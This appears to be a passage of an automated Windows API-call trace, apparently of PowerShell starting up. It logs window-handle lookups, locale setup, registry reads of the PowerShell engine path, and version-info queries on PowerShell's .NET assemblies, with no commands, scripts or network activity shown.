	[0262.312] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x31c
	[0262.312] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x330
	[0262.312] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x128
	[0262.312] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x5c8
	[0262.312] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x6f8
	[0262.312] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x358
	[0262.312] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x73c
	[0262.312] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0xb0
	[0262.312] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x250
	[0262.312] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x240
	[0262.312] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x790
	[0262.312] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x61c
	[0262.312] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x568
	[0262.313] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x538
	[0262.313] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x540
	[0262.313] GetWindowThreadProcessId (in: hWnd=0x700a4, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x510
	[0262.313] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x460
	[0262.313] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x79c
	[0262.313] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x4e0
	[0262.313] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x460
	[0262.313] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x12d860 | out: lpdwProcessId=0x12d860) returned 0x778
	[0262.316] WerSetFlags () returned 0x0
	[0262.322] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0262.322] CoTaskMemFree (pv=0x0) 
	[0262.323] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12dbc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12dbc0 | out: pulNumLanguages=0x12dbc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12dbc0) returned 1
	[0262.323] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12dbc8, pwszLanguagesBuffer=0x2bf1530, pcchLanguagesBuffer=0x12dbc0 | out: pulNumLanguages=0x12dbc8, pwszLanguagesBuffer=0x2bf1530, pcchLanguagesBuffer=0x12dbc0) returned 1
	[0262.327] CoTaskMemAlloc (cb=0x24) returned 0x3a6600
	[0262.327] GetUserDefaultLocaleName (in: lpLocaleName=0x3a6600, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0262.327] CoTaskMemFree (pv=0x3a6600) 
	[0263.019] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0263.019] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0263.019] CoTaskMemFree (pv=0x3a6ee0) 
	[0263.021] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0263.021] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0263.021] CoTaskMemFree (pv=0x3a6ee0) 
	[0263.023] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0263.023] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0263.023] CoTaskMemFree (pv=0x3a6ee0) 
	[0263.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.033] SetErrorMode (uMode=0x1) returned 0x1
	[0263.034] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12d840 | out: lpFileInformation=0x12d840*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0263.034] SetErrorMode (uMode=0x1) returned 0x1
	[0263.034] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12dab0 | out: lpdwHandle=0x12dab0) returned 0x94c
	[0263.035] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bf4dc0 | out: lpData=0x2bf4dc0) returned 1
	[0263.036] VerQueryValueW (in: pBlock=0x2bf4dc0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12da28, puLen=0x12da20 | out: lplpBuffer=0x12da28*=0x2bf4e5c, puLen=0x12da20) returned 1
	[0263.036] VerQueryValueW (in: pBlock=0x2bf4dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12d998, puLen=0x12d990 | out: lplpBuffer=0x12d998*=0x2bf4f38, puLen=0x12d990) returned 1
	[0263.036] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0263.036] CoTaskMemAlloc (cb=0x2e) returned 0x370170
	[0263.036] lstrcpyW (in: lpString1=0x370170, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0263.036] CoTaskMemFree (pv=0x370170) 
	[0263.036] VerQueryValueW (in: pBlock=0x2bf4dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12d998, puLen=0x12d990 | out: lplpBuffer=0x12d998*=0x2bf4f8c, puLen=0x12d990) returned 1
	[0263.036] lstrlenW (lpString="System.Management.Automation") returned 28
	[0263.036] CoTaskMemAlloc (cb=0x3c) returned 0x3b1190
	[0263.036] lstrcpyW (in: lpString1=0x3b1190, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0263.036] CoTaskMemFree (pv=0x3b1190) 
	[0263.036] VerQueryValueW (in: pBlock=0x2bf4dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12d998, puLen=0x12d990 | out: lplpBuffer=0x12d998*=0x2bf4fe8, puLen=0x12d990) returned 1
	[0263.036] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0263.036] CoTaskMemAlloc (cb=0x20) returned 0x3af300
	[0263.036] lstrcpyW (in: lpString1=0x3af300, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0263.036] CoTaskMemFree (pv=0x3af300) 
	[0263.036] VerQueryValueW (in: pBlock=0x2bf4dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12d998, puLen=0x12d990 | out: lplpBuffer=0x12d998*=0x2bf5028, puLen=0x12d990) returned 1
	[0263.036] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0263.036] CoTaskMemAlloc (cb=0x44) returned 0x3b1190
	[0263.036] lstrcpyW (in: lpString1=0x3b1190, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0263.036] CoTaskMemFree (pv=0x3b1190) 
	[0263.036] VerQueryValueW (in: pBlock=0x2bf4dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12d998, puLen=0x12d990 | out: lplpBuffer=0x12d998*=0x2bf5090, puLen=0x12d990) returned 1
	[0263.036] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0263.036] CoTaskMemAlloc (cb=0x76) returned 0x3543d0
	[0263.036] lstrcpyW (in: lpString1=0x3543d0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0263.037] CoTaskMemFree (pv=0x3543d0) 
	[0263.037] VerQueryValueW (in: pBlock=0x2bf4dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12d998, puLen=0x12d990 | out: lplpBuffer=0x12d998*=0x2bf512c, puLen=0x12d990) returned 1
	[0263.037] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0263.037] CoTaskMemAlloc (cb=0x44) returned 0x3b1190
	[0263.037] lstrcpyW (in: lpString1=0x3b1190, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0263.037] CoTaskMemFree (pv=0x3b1190) 
	[0263.037] VerQueryValueW (in: pBlock=0x2bf4dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12d998, puLen=0x12d990 | out: lplpBuffer=0x12d998*=0x2bf5190, puLen=0x12d990) returned 1
	[0263.037] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0263.037] CoTaskMemAlloc (cb=0x58) returned 0x3768d0
	[0263.037] lstrcpyW (in: lpString1=0x3768d0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0263.037] CoTaskMemFree (pv=0x3768d0) 
	[0263.037] VerQueryValueW (in: pBlock=0x2bf4dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12d998, puLen=0x12d990 | out: lplpBuffer=0x12d998*=0x2bf520c, puLen=0x12d990) returned 1
	[0263.037] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0263.037] CoTaskMemAlloc (cb=0x20) returned 0x3af300
	[0263.037] lstrcpyW (in: lpString1=0x3af300, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0263.037] CoTaskMemFree (pv=0x3af300) 
	[0263.037] VerQueryValueW (in: pBlock=0x2bf4dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12d998, puLen=0x12d990 | out: lplpBuffer=0x12d998*=0x2bf4eb4, puLen=0x12d990) returned 1
	[0263.037] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0263.037] CoTaskMemAlloc (cb=0x66) returned 0x3a52b0
	[0263.037] lstrcpyW (in: lpString1=0x3a52b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0263.037] CoTaskMemFree (pv=0x3a52b0) 
	[0263.037] VerQueryValueW (in: pBlock=0x2bf4dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12d998, puLen=0x12d990 | out: lplpBuffer=0x12d998*=0x0, puLen=0x12d990) returned 0
	[0263.037] VerQueryValueW (in: pBlock=0x2bf4dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12d998, puLen=0x12d990 | out: lplpBuffer=0x12d998*=0x0, puLen=0x12d990) returned 0
	[0263.037] VerQueryValueW (in: pBlock=0x2bf4dc0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12d998, puLen=0x12d990 | out: lplpBuffer=0x12d998*=0x0, puLen=0x12d990) returned 0
	[0263.037] VerQueryValueW (in: pBlock=0x2bf4dc0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12d968, puLen=0x12d960 | out: lplpBuffer=0x12d968*=0x2bf4e5c, puLen=0x12d960) returned 1
	[0263.037] CoTaskMemAlloc (cb=0x204) returned 0x35b1e0
	[0263.037] VerLanguageNameW (in: wLang=0x0, szLang=0x35b1e0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0263.037] CoTaskMemFree (pv=0x35b1e0) 
	[0263.037] VerQueryValueW (in: pBlock=0x2bf4dc0, lpSubBlock="\\", lplpBuffer=0x12d9b8, puLen=0x12d9b0 | out: lplpBuffer=0x12d9b8*=0x2bf4de8, puLen=0x12d9b0) returned 1
	[0263.044] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0263.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0263.044] CoTaskMemFree (pv=0x3a6ee0) 
	[0263.046] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0263.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0263.046] CoTaskMemFree (pv=0x3a6ee0) 
	[0263.048] lstrlenW (lpString="䅁") returned 1
	[0263.705] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d888 | out: phkResult=0x12d888*=0x308) returned 0x0
	[0263.706] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d878 | out: phkResult=0x12d878*=0x30c) returned 0x0
	[0263.707] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d908 | out: phkResult=0x12d908*=0x310) returned 0x0
	[0263.711] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d84c, lpData=0x0, lpcbData=0x12d848*=0x0 | out: lpType=0x12d84c*=0x1, lpData=0x0, lpcbData=0x12d848*=0x56) returned 0x0
	[0263.712] CoTaskMemAlloc (cb=0x5a) returned 0x3a5240
	[0263.712] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d81c, lpData=0x3a5240, lpcbData=0x12d818*=0x56 | out: lpType=0x12d81c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d818*=0x56) returned 0x0
	[0263.712] CoTaskMemFree (pv=0x3a5240) 
	[0263.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0263.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0264.743] CoTaskMemAlloc (cb=0x104) returned 0x3a6ee0
	[0264.743] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ee0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0264.743] CoTaskMemFree (pv=0x3a6ee0) 
	[0266.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0266.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0267.697] CoTaskMemAlloc (cb=0x104) returned 0x3a6ff0
	[0267.698] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.698] CoTaskMemFree (pv=0x3a6ff0) 
	[0267.699] CoTaskMemAlloc (cb=0x104) returned 0x3a6ff0
	[0267.699] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0267.699] CoTaskMemFree (pv=0x3a6ff0) 
	[0268.167] CoTaskMemAlloc (cb=0x104) returned 0x3a6ff0
	[0268.167] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0268.167] CoTaskMemFree (pv=0x3a6ff0) 
	[0268.167] CoTaskMemAlloc (cb=0x104) returned 0x3a6ff0
	[0268.167] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0268.167] CoTaskMemFree (pv=0x3a6ff0) 
	[0268.167] CoTaskMemAlloc (cb=0x104) returned 0x3a6ff0
	[0268.167] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0268.167] CoTaskMemFree (pv=0x3a6ff0) 
	[0269.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0269.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0269.222] CoTaskMemAlloc (cb=0x104) returned 0x3a6ff0
	[0269.222] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.222] CoTaskMemFree (pv=0x3a6ff0) 
	[0269.225] CoTaskMemAlloc (cb=0x104) returned 0x3a6ff0
	[0269.225] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a6ff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0269.225] CoTaskMemFree (pv=0x3a6ff0) 
	[0269.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0269.798] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0273.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0273.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0274.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0274.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0275.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0275.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0276.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0276.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x12d440, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0277.084] CoTaskMemAlloc (cb=0x104) returned 0x3a7210
	[0277.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3a7210, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0277.084] CoTaskMemFree (pv=0x3a7210) 
	[0277.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0277.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0277.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
